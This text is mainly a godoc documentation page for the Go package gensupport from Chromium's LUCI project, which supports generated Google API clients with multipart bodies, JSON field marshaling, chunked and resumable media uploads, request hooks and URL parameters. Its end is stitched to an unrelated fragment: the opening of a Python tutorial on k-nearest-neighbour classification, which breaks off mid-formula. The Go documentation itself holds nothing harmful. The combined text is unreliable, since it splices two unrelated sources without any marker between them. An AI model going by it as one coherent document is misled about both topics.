import "go.chromium.org/luci/common/api/internal/gensupport" Package gensupport is an internal implementation detail used by code generated by the google-api-go-generator tool. This package may be modified at any time without regard for backwards compatibility. It should not be used directly by API users. buffer.go doc.go json.go jsonfloat.go media.go params.go resumable.go send.go version.go func CombineBodyMedia(body io.Reader, bodyContentType string, media io.Reader, mediaContentType string) (io.ReadCloser, string) CombineBodyMedia combines a json body with media content to create a multipart/related HTTP body. It returns a ReadCloser containing the combined body, and the overall "multipart/related" content type, with random boundary. The caller must call Close on the returned ReadCloser if reads are abandoned before reaching EOF. DecodeResponse decodes the body of res into target. If there is no body, target is unchanged. DetermineContentType determines the content type of the supplied reader. If the content type is already known, it can be specified via ctype. Otherwise, the content of media will be sniffed to determine the content type. If media implements googleapi.ContentTyper (deprecated), this will be used instead of sniffing the content. After calling DetectContentType the caller must not perform further reads on media, but rather read from the Reader that is returned. GoVersion returns the Go runtime version. The returned string has no whitespace. MarshalJSON returns a JSON encoding of schema containing only selected fields. A field is selected if any of the following is true: * it has a non-empty value * its field name is present in forceSendFields and it is not a nil pointer or nil interface * its field name is present in nullFields. The JSON key for each selected field is taken from the field's json: struct tag. ReaderAtToReader adapts a ReaderAt to be used as a Reader. If ra implements googleapi.ContentTyper, then the returned reader will also implement googleapi.ContentTyper, delegating to ra. RegisterHook registers a Hook to be called before each HTTP request by a generated API. Hooks are called in the order they are registered. Each hook can return a function; if it is non-nil, it is called after the HTTP request returns. These functions are called in the reverse order. RegisterHook should not be called concurrently with itself or SendRequest. func SendRequest(ctx context.Context, client *http.Client, req *http.Request) (*http.Response, error) SendRequest sends a single HTTP request using the given client. If ctx is non-nil, it calls all hooks, then sends the request with req.WithContext, then calls any functions returned by the hooks in reverse order. SetGetBody sets the GetBody field of req to f. This was once needed to gracefully support Go 1.7 and earlier which didn't have that field. Deprecated: the code generator no longer uses this as of 2019-02-19. Nothing else should be calling this anyway, but we won't delete this immediately; it will be deleted in as early as 6 months. func SetOptions(u URLParams, opts ...googleapi.CallOption) SetOptions sets the URL params and any additional call options. Backoff is an interface around gax.Backoff's Pause method, allowing tests to provide their own implementation. Hook is the type of a function that is called once before each HTTP request that is sent by a generated API. It returns a function that is called after the request returns. Hooks are not called if the context is nil. JSONFloat64 is a float64 that supports proper unmarshaling of special float values in JSON, according to. Although that is a proto-to-JSON spec, it applies to all Google APIs. The jsonpb package () has similar functionality, but only for direct translation from proto messages to JSON. func (f *JSONFloat64) UnmarshalJSON(data []byte) error MediaBuffer buffers data from an io.Reader to support uploading media in retryable chunks. It should be created with NewMediaBuffer. func NewMediaBuffer(media io.Reader, chunkSize int) *MediaBuffer NewMediaBuffer initializes a MediaBuffer. func PrepareUpload(media io.Reader, chunkSize int) (r io.Reader, mb *MediaBuffer, singleChunk bool) PrepareUpload determines whether the data in the supplied reader should be uploaded in a single request, or in sequential chunks. chunkSize is the size of the chunk that media should be split into. If chunkSize is zero, media is returned as the first value, and the other two return values are nil, true. Otherwise, a MediaBuffer is returned, along with a bool indicating whether the contents of media fit in a single chunk. After PrepareUpload has been called, media should no longer be used: the media content should be accessed via one of the return values. Chunk returns the current buffered chunk, the offset in the underlying media from which the chunk is drawn, and the size of the chunk. Successive calls to Chunk return the same chunk between calls to Next. func (mb *MediaBuffer) Next() Next advances to the next chunk, which will be returned by the next call to Chunk. Calls to Next without a corresponding prior call to Chunk will have no effect. MediaInfo holds information for media uploads. It is intended for use by generated code only. NewInfoFromMedia should be invoked from the Media method of a call. It returns a MediaInfo populated with chunk size and content type, and a reader or MediaBuffer if needed. NewInfoFromResumableMedia should be invoked from the ResumableMedia method of a call. It returns a MediaInfo using the given reader, size and media type. func (mi *MediaInfo) ResumableUpload(locURI string) *ResumableUpload ResumableUpload returns an appropriately configured ResumableUpload value if the upload is resumable, or nil otherwise. func (mi *MediaInfo) SetProgressUpdater(pu googleapi.ProgressUpdater) SetProgressUpdater sets the progress updater for the media info. func (mi *MediaInfo) UploadRequest(reqHeaders http.Header, body io.Reader) (newBody io.Reader, getBody func() (io.ReadCloser, error), cleanup func()) UploadRequest sets up an HTTP request for media upload. It adds headers as necessary, and returns a replacement for the body and a function for http.Request.GetBody. UploadType determines the type of upload: a single request, or a resumable series of requests. type ResumableUpload struct { Client *http.Client // URI is the resumable resource destination provided by the server after specifying "&uploadType=resumable". URI string UserAgent string // User-Agent for header of the request // Media is the object being uploaded. Media *MediaBuffer // MediaType defines the media type, e.g. "image/jpeg". MediaType string // Callback is an optional function that will be periodically called with the cumulative number of bytes uploaded. Callback func(int64) // contains filtered or unexported fields } ResumableUpload is used by the generated APIs to provide resumable uploads. It is not used by developers directly. func (rx *ResumableUpload) Progress() int64 Progress returns the number of bytes uploaded at this point. Upload starts the process of a resumable upload with a cancellable context. It retries using the provided back off strategy until cancelled or the strategy indicates to stop retrying. It is called from the auto-generated API code and is not visible to the user. Before sending an HTTP request, Upload calls any registered hook functions, and calls the returned functions after the request returns (see send.go). rx is private to the auto-generated API code. Exactly one of resp or err will be nil. If resp is non-nil, the caller must call resp.Body.Close. URLParams is a simplified replacement for url.Values that safely builds up URL parameters for encoding. Encode encodes the values into “URL encoded” form ("bar=baz&foo=quux") sorted by key. Get returns the first value for the given key, or "". Set sets the key to value. It replaces any existing values. SetMulti sets the key to an array of values. It replaces any existing values. Note that values must not be modified after calling SetMulti so the caller is responsible for making a copy if necessary. Package gensupport imports 21 packages (graph) and is imported by 5 packages. Updated 2020-07-02. Refresh now. Tools for package owners.
https://godoc.org/go.chromium.org/luci/common/api/internal/gensupport
CC-MAIN-2020-29
refinedweb
1,325
51.55
BioSQL Revision as of 20:37, 14 December 2007. NOTE - At the time of writing, there are a few problems with BioSQL and Biopython 1.44 which are being fixed in CVS. scheme) and cvs (to get some BioSQL files). Again, on a Debian or Ubuntu Linux machine try this: sudo apt-get install perl cvs You may find perl is already installed. For Windows users, see BioSQL/Windows. Downloading the BioSQL Schema & Scripts One the software is installed, your next task is to setup a database and import the BioSQL scheme (i.e. setup the relevant tables within the database). If you have CVS installed, then on Linux you can download the latest schema like this (password is 'cvs'). cd ~ mkdir repository cd repository cvs -d :pserver:cvs@code.open-bio.org:/home/repository/biopython checkout biosql cvs -d :pserver:cvs@code.open-bio.org:/home/repository/biosql checkout biosql-schema cd biosql-schema/sql If you don't want to use CVS, then download the files via the View CVS web interface. Click the Download tarball link to get a tar.gz file containing all the current CVS file, and then unzip that. Or, navigate to the relevant schema file for your database and download just that, e.g. biosql-schema/sql/biosqldb-mysql.sql for MySQL. You will also want the NCBI Taxonomy loading perl script, scripts/load_ncbi_taxonomy.pl. Creating the empty database Assuming you are using (file ~/repository/biosql-schema/sql/biosqldb-mysql.sql if you downloaded the files where we suggested). cd ~/repository/biosql-schema/sql. NCBI Taxonomy Before you start trying to load sequences into the database, it is a good idea to load the NCBI taxonomy database using the scripts/load_ncbi_taxonomy.pl script in the BioSQL package. The script should be able to download the files it needs from the NCBI taxonomy FTP site automatically: cd ~/repository/biosql-schema/scripts ./load_ncbi_taxonomy.pl --dbname bioseqdb --driver mysql --dbuser root --download true. Running the unit tests Because there are so many ways you could have setup your BioSQL database, you my have to tell the unit test a few bits of information. If you have followed these instructions, then the unit test should just work (using CVS, what will be the next release after Biopython 1.44). If you have done things differently (e.g. PostgreSQL instead of MySQL, or using a different database username and password), then you need to edit the script Tests/setup_BioSQL.py and fill Creating a (sub) database BioSQL lets us define named "sub" databases.adaptor.commit() The call server.adaptor.commit() database. You can check this at the command line: mysql --user=root bioseqdb -e "select * from biodatabase;" Which should give something like this (assuming you haven't done any other testing yet): +----------------+---------+-----------+------------------+ | biodatabase_id | name | authority | description | +----------------+---------+-----------+------------------+ | 1 | orchids | NULL | Just for testing | +----------------+---------+-----------+------------------+ Now that we have setup an orchids database GenBank from Bio import SeqIO handle = GenBank.download_many(['6273291', '6273290', '6273289']): Now, instead of printing things on screen, let's add these three records to a new (empty) orchid database: from Bio import GenBank from Bio import SeqIO from BioSQL import BioSeqDatabase server = BioSeqDatabase.open_database(driver="MySQLdb", user="root", passwd = "", host = "localhost", db="bioseqdb") db = server["orchids"] handle = GenBank.download_many(['6273291', '6273290', '6273289']) db.load(SeqIO.parse(handle, "genbank")) server.adaptor.commit() Again, you must explicitly call server.adaptor: from BioSQL import BioSeqDatabase server = BioSeqDatabase.open_database(driver="MySQLdb", user="root", passwd = "", host = "localhost", db="bioseqdb") db = server["orchids"] for identifiers in ['6273291', '6273290', '6273289'] : seq_record = db.lookup(gi=identifiers) Todo - sort out the annotation, e.g. bug 2396.. Deleting a (sub) database As mentioned above, BioSQL lets us define named "sub" databases.adaptor.commit() Again, you must explicitly finialise the SQL transaction with server.adaptor.commit() to make!
http://biopython.org/w/index.php?title=BioSQL&diff=2009&oldid=1993
CC-MAIN-2014-35
refinedweb
630
58.18
Parent Directory | Revision Log finley (WIP): -moved all of finley into its namespace -introduced some shared pointers -Mesh is now a class -other bits and pieces... Finley changes that were held back while in release mode - moved more stuff into finley namespace. finley ElementFile is now a class...). some finley memory Initial all c++ build. But ... there are now reinterpret_cast<>'s Some simple experiments for c++ Finley Round 1 of copyright fixes First pass of updating copyright notices Assorted spelling fixes in finley C. Fixed declaration order (register const) for gcc-4.6 compiler fixes missing file This form allows you to request diffs between any two revisions of this file. For each of the two "sides" of the diff, enter a numeric revision.
https://svn.geocomp.uq.edu.au/escript/trunk/finley/src/Mesh_addPoints.cpp?view=log&pathrev=4498
CC-MAIN-2019-30
refinedweb
124
56.15
. At the end, however, Tridge touched on his role in the separation of the kernel project and BitKeeper. He couldn't talk about much, and he did not announce the release of his BitKeeper client. But he noted that there has been quite a bit of confusion and misinformation regarding what he actually did. It was not, he says, an act of wizardly reverse engineering. Getting a handle on the BitKeeper network protocol turned out to be rather easier than that. He started by noting that a BitKeeper repository has an identifier like bk://thunk.org:5000/. So, he asked, what happens if you connect to the BitKeeper server port using telnet? A quick demonstration sufficed: telnet thunk.org 5000 Trying 69.25.196.29... Connected to thunk.org. Escape character is '^]'. Once connected, why not type a command at it? ? - print this help abort - abort resolve check - check repository clone - clone the current repository help - print this help httpget - http get command [...] Tridge noted that this sort of output made the "reverse engineering" process rather easier. What, he wondered, was the help command there for? Did the BitKeeper client occasionally get confused and have to ask for guidance? Anyway, given that output, Tridge concluded that perhaps the clone command could be utilized to obtain a clone of a repository. Sure enough, it returned a large volume of output. Even better, that output was a simple series of SCCS files. At that point, the "reverse engineering" task is essentially complete. There was not a whole lot to it. Now we know about the work which brought about an end to the BitKeeper era. April 20, 2005 This article was contributed by Joe 'Zonker' Brockmeier. This reputation has been a bit tattered in recent weeks, though perhaps unfairly. The Mozilla project has released three security updates since February, which has prompted some to call into question the respective security of Firefox in particular, and open source products in general. Is this proof that Firefox or the Mozilla Suite suffer from as many serious security vulnerabilities as Internet Explorer? Maybe, but the evidence that's in so far suggests otherwise. We spoke to Chris Hofmann, Mozilla's director of engineering, about the recent security fixes and the Mozilla Foundation's security policies. Hofmann said that Mozilla has built "a larger security community since the Firefox 1.0 release, with "some experts working with us to examine the code and identify potential problems." He also acknowledged that there will be vulnerabilities, but the project is committed to providing a secure browser and repairing problems as quickly as possible. The latest update closed nine security vulnerabilities three tagged "critical," two rated "high" severity and four rated as "moderate" vulnerabilities. Some of the vulnerabilities have yet to be disclosed, despite the fact that the update is now available. Hofmann said that the project was respecting the wishes of the person reporting the bugs, and that the project tries to use "best judgement" about providing information about exploits. He also noted that it gives users ample time to install updates prior to releasing information that might be used to exploit vulnerabilities. We also checked on the Mozilla Project's security policies to see what they had to say about disclosure: Interested readers may also want to peruse the rest of the Mozilla project's security policies. The 1.0.3 release went through several release candidates before it was finally officially released. We asked Hofmann about the length of time required to release a security fix, what was involved and why it took several weeks to push out a patch. Hofmann said that the Mozilla team was capable of putting out a release quickly, and noted the 24-hour turnaround with the shell exploit discovered last fall. Hofmann also pointed out that the Mozilla team has pushed out security updates in a matter of days or weeks, whereas Microsoft has been known to push out fixes for vulnerabilities that have been known for months rather than just a short time. He also noted that the team needs to push out documentation updates, and get information out to application developers and authors of extensions. Hofmann said that a couple of the changes in the 1.0.3 release will require some extension authors to make "adjustments to be forward-compatible" and that most extensions that were affected already have new versions available for Firefox 1.0.3. At any rate, as pointed out on MozillaNews, there have been more vulnerabilities documented by Symantec that affect Mozilla browsers, but that IE has a greater number of high-severity vulnerabilities. It should also be noted that the vulnerabilities listed for Firefox have not been widely exploited, while IE has been widely exploited. Several critical issues in IE remain open. To be fair, a few vulnerabilities are still listed for Firefox as well. It's certainly true that Firefox and the Mozilla Suite are not perfect, and do not offer a 100 percent guarantee against security problems simply because the projects are open source. The increased attention being paid to Firefox almost assures that further vulnerabilities will be found. However, the project is developing a good track record of fixing security vulnerabilities as they are discovered, and proactively seeking out security problems. To date, Hofmann says that he is not aware of any exploits in the wild that affect Firefox or Mozilla, which means that the vulnerabilities that have been reported have not had any real impact on the Mozilla userbase aside from the inconvenience of upgrading -- which can hardly be said for Internet Explorer. Those with a careful eye for distinguishing between the severity of vulnerabilities, the length of time required to find fixes and actual exploits, will find that Firefox is still the better choice for security-conscious users. The technology of photography has moved forward in recent years, but certain issues remain. Your editor's closets contain numerous binders full of carefully organized negatives, contact sheets, and slides. Said closets also contain several boxes full of rather less carefully organized photographic output. There's a lot of great pictures there, but chances are good that nobody will ever see them. Organizing photographs is hard. Now your editor's hard drive looks rather like those boxes in the closet; several years worth of digital photos have accumulated in a messy directory hierarchy with no easy way to find anything of interest. The move to the digital format has, if anything, made the mess worse. How can one cope with all those images? Your editor decided that there must be a free application out there which might help; here is what he found. Any graphical file manager can enable mouse-based navigation through a directory tree full of images. An application tuned to image management, however, should offer more than that. Anything that can be done to help find a specific image - searching by date, where the picture was taken, who is in it, etc. - is more than welcome. One should not have to dig through a huge box of photos to find that darling shot of one's toddler performing gravity research with the new laptop. This sort of searching requires the creation and maintenance of metadata for images; a good application will make that task easy. Images from digital cameras include a significant amount of embedded data in the exchangeable image file format (EXIF). The EXIF data can contain the date and time of the picture and a great deal of information on the state of the camera. An image manager should provide easy access to that data, and make use of it when appropriate. Image management also involves various types of image manipulation. At the simple end of the scale, this means quickly getting rid of the unsuccessful (or incriminating) shots, and, perhaps, changing the orientation of portrait-mode shots. Your editor has found that the family does not always appreciate receiving full-resolution images from his 7 megapixel camera, so the ability to rescale images is needed. Cropping is another common task, both to remove uninteresting imagery or to fit a specific aspect ratio. From there, one can get into color balance tweaking, red-eye removal, noise removal, in-law removal, and advanced psychedelic effects. A good image manager should make the simpler tasks quick and easy, and the harder tasks possible - even if that just involves dumping the user into the Gimp. An image manager should work well with the rest of the system; it doesn't necessarily help to fix up an image if you can't find the result afterward. An image manager which claims ownership over images and makes them hard to find outside of the application is making life harder. Similarly, some graphical users may appreciate a "move to trash" capability, but the more grumpy among us still like files to simply go away when asked, and have no use for a trash can; an image manager should be able to make files just go away. A good image manager will make printing easy, including selecting high-quality modes, printing multiple images per page, etc. An added bonus for some users might be the ability to quickly create a web page with a set of images. The ability to write a set of images to a CD might also be useful for some. Your editor reviewed five image management applications, and spent a long day valiantly trying to build a working version of a sixth. Each tool was used to work with its own copy of a directory hierarchy containing about 3000 photos taken over many years. This has been a fun project; there is some good work being done in this area. Free image management tools are still in a relatively primitive form, however; some of them are maturing quickly, but there is some ground yet to cover. Your editor reviewed DigiKam once before, as part of a previous article on camera interface tools. We'll return to digiKam (and gthumb, below) to examine its image management capabilities. DigiKam is a KDE-based application under active development; version 0.7.2 was released on March 4. DigiKam wants to organize images into "albums." An album is a simple directory full of image files, though digiKam goes out of its way to hide that fact. Files can be "imported" into an album from anywhere; if the file comes from outside the album's directory, however, a copy will be made. The importing process for a large tree of images can be slow, but it only has to be done once. A binary file (digikam.db) appears to track all of the albums known to the application. The digiKam window shows a pane with the album hierarchy, and a large area with thumbnails from the currently-selected album. By default, the thumbnails are annotated with the size of the image (only); the presentation used consumes a relatively large amount of screen space. Double-clicking on a thumbnail will produce a new window displaying the image itself. The left-hand pane also includes an area called "My Tags." A few predefined tags ("Events," "People") exist; adding others is easily done with the menus. Clicking on a tag will bring up all images which currently have that tag assigned to them. There appears to be no way to get a view of more than one tag at once. Tags are hierarchical, but there is no inheritance by default. So, for example, if you create tags for each family member under "People," and assign those tags to images, clicking on "People" will not display any of those images. There is a configuration option to change this behavior, however. Assignment of tags to images is done by way of a right-button menu attached to the thumbnail images. There is also a separate "comments and tags" dialog which, in addition to tag management, allows comments to be associated with images. Both comments and tags are displayed underneath each thumbnail image. Other dialogs available from the thumbnail view include a "file properties" window and an EXIF information browser. The properties dialog allows the name and permissions of the file to be changed; it will happily make an image file setuid if you ask. There is also a histogram display which gives information on color distribution in the image. The EXIF browser provides full (read-only) access to the metadata stored within the image file; it has a help window describing (briefly) what each EXIF field means. The image window displays the picture itself, and provides a set of editing options. Rotation, resizing, and cropping are done here; there appears to be no way to constrain the aspect ratio of a cropped image. Rotation of images in digiKam is not optimal: each image must be brought up separately in the image window, rotated, then saved. When you've just pulled dozens of images from your camera, you would like a quicker way to get that job done. Your editor's research indicates that the image window rotation is not lossless. There is said to be a plugin available which can do lossless rotation, but your editor was not able to get it installed. Printing is a big hole in digiKam's capabilities. There appears to be no option to print multiple images at once (much less N-per-page capabilities). The image view window can print a single image, but it requires the user to type in a print command. At this point in the development of the Linux desktop, we can do better than that. Like most KDE applications, digiKam is highly configurable; most users will want to tweak at least a few options. By default, digiKam wants to use a "trash can" when asked to remove images, but it can be convinced to simply delete them instead. There is also a plugin mechanism which can be used to add image editing tools. In summary, digiKam is a capable and useful tool with a few remaining shortcomings. Given its pace of development, chances are that those issues will be ironed out in short order. Perhaps the newest entry into the image management space is f-spot, currently at version 0.0.12. It is a Mono application, written in C#. Despite its youth, f-spot already shows considerable promise, and is a useful application. f-spot does not bother with albums, directories, or any such nonsense. Instead, it implements a single, time-sorted stream of images with the ability to sort on various types of metadata. Images must be imported into f-spot before use, and the import process can be quite slow. After the import process, the user gets a window with a list of tags on the left, an information area on the bottom left, and a large pane with (possibly thousands of) thumbnails. The thumbnails are not rendered until needed, thankfully. A feature unique to f-spot is a timeline at the top; clicking on a given month will scroll the thumbnail window to pictures taken on that date. The timeline is not updated when the thumbnail window is scrolled, however, so the two can get out of sync. The sorting of images depends on the date stored in each image's EXIF data; if that data does not exist, the images are given the current date. There appears to be no way to fix an image with a missing date, so it will be forever displayed in the wrong place. Clicking on a thumbnail causes the lower-left window to be updated with information on that image - date, resolution, and exposure information. Once an image has been selected, a number of editing options are available, including color manipulation, focus adjustment, and rotation. It is possible to select multiple images (by holding down the control key) and rotate them in a single operation. There is a separate window which can be requested (from the "View" menu) to look at the EXIF information stored in an image. f-spot allows the user to assign tags to images in a manner very similar to digiKam's. The application also implements the concept of "categories." Your editor was not able to figure out what categories are supposed to do, and how they relate to tags. It was impossible to create new top-level tags (or categories). In general, the tag mechanism appears to need a little work. At the basic level, however, it functions just fine: clicking on a tag will narrow the thumbnail to images with that tag assigned; it is also possible to narrow further to a specific date range. It would be nice to be able to automatically attach one or more tags to images when they are imported. Double-clicking on a thumbnail replaces the thumbnail pane with the selected image. It is, thus, not possible to view the thumbnail directory and a specific image at the same time. At the bottom of the image window is a line clearly intended for the entry of comments (though the comments are used nowhere else). There is also a pulldown for the desired aspect ratio; using the mouse, a box (constrained to the chosen ratio) can be drawn over the image, and a click on the scissors icon will crop accordingly. There is a red-eye removal option; the user must first select an area to be affected. In your editor's experience, the selection must be done very carefully, or the red-eye removal will leave obvious artifacts. Given the nature of the task, it would be nice to be able to select elliptical areas, rather than squares, for red-eye removal. There is also a color editing dialog available. Nicely, the mouse wheel will quickly zoom the image in and out. f-spot handles image editing in an interesting way. The original image is never overwritten; instead, f-spot creates a new version (called "modified" by default). Different versions are selectable via a pulldown in the image information area. Since f-spot seems to assume you'll never do anything with the files directly, it feels free to give modified versions names like "dsc00450 (Modified (2)).jpg". There is a full set of "export" options for getting images out of f-spot. Images can be exported, for example, to Flickr, to a web gallery, or burned to a CD. The CD writing process seems to work, though some things are unclear - does the program write the original form of an image, or the modified form? The printing support in f-spot is minimal, relative to some of the other tools reviewed here; there is little control over layout and it is easy to get it to attempt to print pages which do not fit on the paper. f-spot shows some clear potential, especially for those who like the "tagged flat" method of organizing things. Its youth is apparent, but it would seem to be growing up fast; f-spot is worth watching. flphoto is a simple image manager based on the FLTK toolkit. It may be suitable for those looking for a lightweight application, but it has been left behind by the competition in a number of ways. Your editor also found this application relatively easy to crash. Version v1.2 was released in January, 2004; there does not appear to have been a great deal of development activity since then. Like digiKam, flphoto works with the concept of "albums," into which photos must be imported. Unlike digikam, however, flphoto cannot import a whole directory hierarchy at once; instead, each directory must be fed to the application separately. An album itself is really just a ".album" file which contains a list of image file names. The flphoto window consists primarily of an image viewing area. Thumbnails are presented in a long, horizontally scrolling window at the bottom; they show up in the order in which they were imported. Clicking on a thumbnail brings the image itself into the main part of the window. To your editor's eye, the quality of the image rendering is poorer than with other applications. Some image editing options are available, including rotation, scaling, cropping (with aspect ratio constraints), sharpening, and red-eye reduction. There is an "edit" option which fires up the GIMP on the selected image. There is no way to rotate multiple images at once. There is a "properties" window which shows basic EXIF information and allows the entry of comments; those comments are not used for anything, however. flphoto has no concept of tags, or of searching for images in any way. Printing works well, with a fair amount of flexibility in how images are printed, and even a simple calendar generator. There is a function for exporting images to a web page; flphoto is not able to burn images to a CD. Overall, flphoto is a tool with some capability, but your editor would recommend that people looking for a new image management utility look elsewhere. gthumb is a GNOME-based application; in many ways it is the most fully-featured of the set. Unlike many other image management applications, gthumb is very much directory-oriented. It is happy working with any directory tree it is pointed to; no need to create albums, import pictures, etc. It thus works well for people who use other applications in their directory hierarchy, or for those who simply want to get started quickly. The main gthumb window should look familiar by now; it has the usual directory pane and area full of thumbnails. The gthumb "folder" pane only shows one level of the hierarchy, however, which increases the amount of clicking required to wander around in a directory tree. A number of operations can be applied to images in the thumbnail view; these include lossless rotation, series renaming, and series format conversion. There is also a tool for locating duplicate images. Double-clicking on a thumbnail brings up the image view; it is not possible to have thumbnails and a full image on the screen simultaneously. EXIF information is available in the image view - if you happen to tell gthumb to show "comments." There are reasonable tools for scaling and cropping (with aspect ratio constraints), and a number of more advanced (but not always useful) image manipulation capabilities. There is no red-eye removal, however. Tags in gthumb are called "categories"; they are not hierarchical. gthumb supports comments on images; it also maintains the location of the image separately. Dates for images are supported; they can be taken from the EXIF information, the file date, or entered manually. The default, however, is "no date," even if the image has EXIF metadata; getting gthumb to actually use that metadata requires bringing up a dialog for each image. There does not appear to be a way to change that unfortunate default. gthumb has the most complete image searching capabilities of any of the tools tested; if you take the time to enter metadata for your images, quite a few search options are available. Searches can be done on any subset of the file name, the image comment (it greps for substrings), the location, the date (on, before, or after - there is no way to specify a date range bounded on both ends), and the categories assigned to the image. If you want to look for all pictures of Aunt Tillie taken at home since the beginning of the year, gthumb can do it. While gthumb normally works with the directory hierarchy, it also implements "catalogs," which are its version of albums. Images can be added to multiple catalogs at will. A special catalog contains the results of the most recent search; those images can be added, in bulk, to another catalog if desired. Thus, the search mechanism can be used to create catalogs relatively quickly - if you have your metadata in place. "Libraries" can be used to create hierarchies of catalogs. Printing support in gthumb is flexible, with the ability to print up to 16 pictures per page. What gthumb lacks (as do all the others) is the ability to specify advanced printing options, such as print quality and paper type. Since that is just the sort of thing one might want to adjust when printing photographs, this omission is a true shortcoming. KimDaBa (the KDE Image Database) is the final tool which your editor was able to make work. It has some powerful capabilities, but could benefit from some usability work. KimDaBa 2.0 was released in October, 2004. The first time a user runs KimDaBa, it asks for an image directory; all images managed by KimDaBa must be kept underneath that directory. If the number of images is large, the import process can take a very long time. When, eventually, the user quits the application, it will ask "do you want to save the changes?" without specifying what the changes are. If the user elects not to "save the changes," KimDaBa will not write its special XML file, and the whole import process must be done again the next time. As it turns out, if you modify an image, KimDaBa will happily exit without asking about saving changes, and those changes will be lost. The initial window is dismayingly textual for an image manager. It gives a few entries with names like "Folder" and "Locations"; the bulk of the window, however, consists of lines like "View images (1-100) 100 images." Clicking on one of those lines will bring up a thumbnail view with exactly 100 images in it. Images are sorted in no clear order; it has little to do with the date or the underlying directory structure. The default background is black (that can be changed), which is a little jarring. KimDaBa does provide other ways of sorting images. The "Folder" line will yield a flattened, directory-oriented view. Users can assign three types of tags to images: "persons," "locations," and "keywords." There is a separate view for each type of tag, allowing quick access to all photos of a specific person, taken in a specific place, or with a given keyword attached to it. The "search" line pops up a dialog which enables a search for a combination of tags. There is also the ability to look at all images within a given date range - but the date filtering does not work in conjunction with the tags. Clicking on an image pops up a window with the full image view. The image window has options for assigning tags to images and for performing rotation; there is no way to do rotation from the thumbnail view. There is also a button on the properties window which will delete the image. Amusingly, KimDaBa offers a "draw on image" option; it allows the user to add arrows, circles, and squares (in black only) to the picture. It is not clear how this capability would be useful. KimDaBa does not provide a way to get at an image's EXIF information, though it is able to use the date found there. In fact, the application will not even display an image's resolution; there seems to be no way to get that information. There is also no option to resize an image. There is a bizarre "lock images" function which causes the application to refuse to display them until the password is entered. Said password, as it turns out, is stored, in plain text, in the "index.xml" file. It would be better to leave out this sort of option; all it provides is a false feeling of security. KimDaBa offers no printing options at all, no web page export, and no CD burning. There is an export operation; it creates a special file which can be imported into KimDaBa running on another system. Work continues on KimDaBa; it appears that version 2.1 will include a plugin mechanism (presumably for image editing functions) and a date bar similar to the one provided by f-spot. One application which your editor was unable to make work is imgSeek. It is a Python program; its unique feature is the ability to look for images which are similar to a drawing made by the user. Version 0.8.4 of imgSeek was released in September, 2004; development seems to be quite slow since then. The version of imgSeek in Debian sid does not run as of this writing. Your editor hopes that imgSeek is able to move forward; this application's developers are trying to do some interesting things. In general, there is a lot going on in this area. Clearly the time has come for the free software world to produce some high-quality image management applications. That said, none of the tools reviewed here can truly be said to be complete, and your editor will resist the temptation to pick a "winner" from the set. Printing support is, perhaps, the weakest area at the moment; Linux now has the capability to provide a great deal of control over printing, but the image managers are not yet using it. Still, the applications reviewed here have reached the point where they are useful tools. It will be fun to see where they go from here. Page editor: Rebecca Sobol Linux is a registered trademark of Linus Torvalds
http://lwn.net/Articles/132051/
CC-MAIN-2013-48
refinedweb
4,890
61.56
This reliable! We can only guarantee a fully trusted authentication for servers we host ourselves! Authentication can later be extended to support login via ssh keys uploaded to (we need to drop this as infra ticket) - - Some projects might need additional GIT repositories containing project parts which have a completely separated lifecycle from the main project. This can be various build-tools (checkstyle-rules, project specific maven-plugins which are needed to build the project) or the project site. This is needed because a GIT branch and tag always affects the whole repository GIT Hooks We need to apply some hooks to the GIT repos to prevent the user from changing a few things. -. grobmeier: deleting tags is possible with SVN, for example when the RC1 tag has failed the vote. Why isn't it allowed with git?). - Pulling from some external (non apache.org hosted) repository must only happen if all the respective commits are done by a person which has an iCLA on file and if the diff of the pull-request is preserved on some ASF server. This can be done by extending JIRA to automatically download the diffs of a pull-request.The project shall not hesitate to animate people to sign our iCLA. - The release plan from couchdb can be found here: Apache Maven supports the usage of GIT with the maven-scm-providers-git since 2008. Be aware that the branch created by a release with GIT always covers the whole repository. Tagging during a VOTE Please note that the only officially result of an ASF release is the source tarball! These zipped and signed sources are also the only thing a VOTE is upon. All other artifacts produced during a build are just nice to have goodies which are no official ASF products. This includes the TAG on any SCM hosted at the ASF or elsewhere. Tagging policy in CouchDB The following is true for CouchDB which decided to not use tagging at all while voting on a release: Do not tag a release until the vote has passed. CouchDB does not issue release candidates in the same way that other projects do. When most users see a release candidate, they think of it as an officially sanctioned version of the software. If we tag our release artefacts (which may be prepared by anyone, at any time) as release candidates while we vote on them, we are sending the wrong message to anyone who finds that tag in the repository. Even if we avoid calling them release candidates, all tags live in the same namespace, so we risk confusing our users if we tag the release artefacts we are voting on, as well as the release artefacts we have actually released. Deleting tags that correspond to failed votes will not help, because Git does not reliably propagate tag deletion to downstream repositories. In answer to these concerns, vote emails must only reference the tree-ish used to prepare the release. When the vote passes must you tag the tree-ish. Preferably using the version number alone, as each Git repository corresponds to exactly one project. The resulting tags in Git form an accurate list of every official release, and every downstream repository will be eventually consistent. Other possible tagging policies The Apache Maven community Many.
http://wiki.apache.org/couchdb/Git_At_Apache_Guide
crawl-003
refinedweb
552
59.64
8. k-Nearest Neighbor Classifier in Python By Bernd Klein. Last modified: 02 Dec 2021.: As explained in the chapter Data Preparation, we need labeled learning and test data. In contrast to other classifiers, however, the pure nearest-neighbor classifiers do not do any learning, but the so-called learning set $LS$ is a basic component of the classifier. The k-Nearest-Neighbor Classifier (kNN) works directly on the learned samples, instead of creating rules compared to other classification methods. Nearest Neighbor Algorithm: Given a set of categories $C = \{c_1, c_2, ... c_m\}$, also called classes, e.g. {"male", "female"}. There is also a learnset $LS$ consisting of labelled instances: $$LS = \{(o_1, c_{o_1}), (o_2, c_{o_2}), \cdots (o_n, c_{o_n}) \}$$ As it makes no sense to have less lebelled items than categories, we can postulate that $n > m$ and in most cases even $n \ggg m$ (n much greater than m.) The task of classification consists in assigning a category or class $c$ to an arbitrary instance $o$. For this, we have to differentiate between two cases: - Case 1: The instance $o$ is an element of $LS$, i.e. there is a tupel $(o, c) \in LS$ In this case, we will use the class $c$ as the classification result. - Case 2: We assume now that $o$ is not in $LS$, or to be precise: $\forall c \in C, (o, c) \not\in LS$ $o$ is compared with all the instances of $LS$. A distance metric $d$ is used for the comparisons. We determine the $k$ closest neighbors of $o$, i.e. the items with the smallest distances. $k$ is a user defined constant and a positive integer, which is usually small. The number $k$ is typically chosen as the square root of $LS$, the total number of points in the training data set. To determine the $k$ nearest neighbors we reorder $LS$ in the following way: $(o_{i_1}, c_{o_{i_1}}), (o_{i_2}, c_{o_{i_2}}), \cdots (o_{i_n}, c_{o_{i_n}})$ so that $d(o_{i_j}, o) \leq 